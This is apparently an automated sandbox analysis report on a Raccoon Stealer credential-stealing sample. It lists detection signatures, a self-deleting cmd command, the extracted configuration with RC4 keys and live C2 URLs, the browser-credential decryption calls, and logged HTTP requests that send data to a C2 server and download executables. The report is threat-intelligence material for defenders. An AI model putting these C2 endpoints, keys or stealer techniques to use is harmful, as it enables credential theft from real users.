Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Tk6dsSEyOC.exe

Overview

General Information

Sample Name:Tk6dsSEyOC.exe
Analysis ID:528742
MD5:3613e68843dd0c745f079a6ef51a6e6a
SHA1:87f91a8e3bf01475cf3fe5a690374f95a4fb66c2
SHA256:271453e30f708718f175654f2b3fb5f4438effb11a928656d58f0051b424c740
Tags:exeRaccoonStealer
Infos:

Most interesting Screenshot:

Detection

Raccoon
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Machine Learning detection for sample
Self deletion via cmd delete
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sigma detected: Suspicious Del in CommandLine
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Tk6dsSEyOC.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\Tk6dsSEyOC.exe" MD5: 3613E68843DD0C745F079A6EF51A6E6A)
    • cmd.exe (PID: 4572 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6656 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"RC4_key2": "3be06ec4609b38e474bb469adec52280", "C2 url": ["http://91.219.236.162/masterdanteloma", "http://185.163.47.176/masterdanteloma", "http://193.38.54.238/masterdanteloma", "http://74.119.192.122/masterdanteloma", "http://91.219.236.240/masterdanteloma", "https://t.me/masterdanteloma"], "Bot ID": "14b265e74e2847e8408db7ca21fe6fe2e9ab5767", "RC4_key1": "hGjLqSdWvLpVmBeD"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
    00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
      00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
        Process Memory Space: Tk6dsSEyOC.exe PID: 7164JoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
          Process Memory Space: Tk6dsSEyOC.exe PID: 7164JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
              0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                0.3.Tk6dsSEyOC.exe.2340000.0.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                  0.2.Tk6dsSEyOC.exe.400000.0.raw.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                    0.2.Tk6dsSEyOC.exe.400000.0.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Del in CommandLineShow sources
                      Source: Process startedAuthor: frack113: Data: Command: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe", CommandLine: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Tk6dsSEyOC.exe" , ParentImage: C:\Users\user\Desktop\Tk6dsSEyOC.exe, ParentProcessId: 7164, ProcessCommandLine: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe", ProcessId: 4572

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Tk6dsSEyOC.exeVirustotal: Detection: 49%Perma Link
                      Source: Tk6dsSEyOC.exeReversingLabs: Detection: 54%
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR
                      Antivirus detection for URL or domainShow sources
                      Source: http://188.127.251.217/sys64.exeAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: http://188.127.251.217/sys64.exeVirustotal: Detection: 12%Perma Link
                      Machine Learning detection for sampleShow sources
                      Source: Tk6dsSEyOC.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040E727 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,0_2_0040E727
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040D560 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,0_2_0040D560
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0042770E CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,0_2_0042770E
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040F78B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,0_2_0040F78B
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004278E1 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,0_2_004278E1
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040DC7B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,0_2_0040DC7B
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0041E52C __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot,0_2_0041E52C

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeUnpacked PE file: 0.2.Tk6dsSEyOC.exe.400000.0.unpack
                      Source: Tk6dsSEyOC.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49766 version: TLS 1.2
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
                      Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb source: Tk6dsSEyOC.exe
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
                      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr
                      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
                      Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
                      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.427951428.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000002.481321705.000000004BC7E000.00000004.00000010.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
                      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
                      Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb0= source: Tk6dsSEyOC.exe
                      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
                      Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
                      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
                      Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr, MapiProxy_InUse.dll.0.dr
                      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
                      Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
                      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
                      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
                      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
                      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
                      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
                      Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr, mozMapi32_InUse.dll.0.dr
                      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
                      Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
                      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.372483857.000000004BC51000.00000004.00000010.sdmp, AccessibleMarshal.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
                      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.373618716.000000004BC7F000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373284353.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373416548.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373403037.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373313194.000000004BC7E000.00000004.00000010.sdmp, breakpadinjector.dll.0.dr
                      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0043DA90 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_0043DA90
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0045E752 FindFirstFileExW,0_2_0045E752
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00434721 __EH_prolog,GetLogicalDriveStringsA,0_2_00434721
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49767 -> 91.219.236.69:80
                      Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49767 -> 91.219.236.69:80
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: http://91.219.236.162/masterdanteloma
                      Source: Malware configuration extractorURLs: http://185.163.47.176/masterdanteloma
                      Source: Malware configuration extractorURLs: http://193.38.54.238/masterdanteloma
                      Source: Malware configuration extractorURLs: http://74.119.192.122/masterdanteloma
                      Source: Malware configuration extractorURLs: http://91.219.236.240/masterdanteloma
                      Source: Malware configuration extractorURLs: https://t.me/masterdanteloma
                      Source: Joe Sandbox ViewASN Name: SERVERASTRA-ASHU SERVERASTRA-ASHU
                      Source: Joe Sandbox ViewASN Name: SERVERASTRA-ASHU SERVERASTRA-ASHU
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: global trafficHTTP traffic detected: GET /masterdanteloma HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 91.219.236.69
                      Source: global trafficHTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/762b827e1bbc7bd715bf97e0fb01fbddd5bf5ab2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.69
                      Source: global trafficHTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.69
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1400Host: 91.219.236.69
                      Source: Joe Sandbox ViewIP Address: 91.219.236.240 91.219.236.240
                      Source: Joe Sandbox ViewIP Address: 91.219.236.162 91.219.236.162
                      Source: Joe Sandbox ViewIP Address: 91.219.236.162 91.219.236.162
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 25 Nov 2021 17:24:09 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Sun, 14 Nov 2021 14:06:13 GMTETag: "619117d5-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
